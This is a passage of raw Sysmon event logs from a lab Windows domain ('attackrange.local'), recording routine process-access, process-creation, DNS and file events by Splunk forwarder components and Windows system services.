Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CDF-6151-7200-00000000FD01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.621{5EBD8912-8CDF-6151-7200-00000000FD01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001054351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.656{5EBD8912-8CD0-6151-2800-00000000FD01}2200win-dc-4290fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000001054350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.128{5EBD8912-8CDE-6151-7100-00000000FD01}37243956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE0-6151-7300-00000000FD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CE0-6151-7300-00000000FD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.690{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE0-6151-7300-00000000FD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.513{5EBD8912-8CE0-6151-7300-00000000FD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001054371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.410{5EBD8912-8CDC-6151-6E00-00000000FD01}2608win-dc-429.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 17141700x80000000000000001054370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:32.394{5EBD8912-8CC0-6151-1000-00000000FD01}440\W32TIME_ALTC:\Windows\system32\svchost.exe 23542300x8000000000000000980633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:32.602{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BB0F53D21249FA35BC3458022DD5D2AF,SHA256=3BA33B30D51E28CE8BFE3F44111EE00DDC88109344EC9D7638C0E618C003232F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:32.056{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19E081291D92843D4BAC2E8D1B81F9AE,SHA256=25112DDB86C53180AB12447CC865350F34BBC063DDDBDEEB49751B324AD83DF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.755{5EBD8912-8CE1-6151-7400-00000000FD01}35963580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x80000000000000001054399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.378{5EBD8912-8CC0-6151-1400-00000000FD01}1040_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\svchost.exe 22542200x80000000000000001054398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.378{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000001054397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.581{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE1-6151-7400-00000000FD01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTE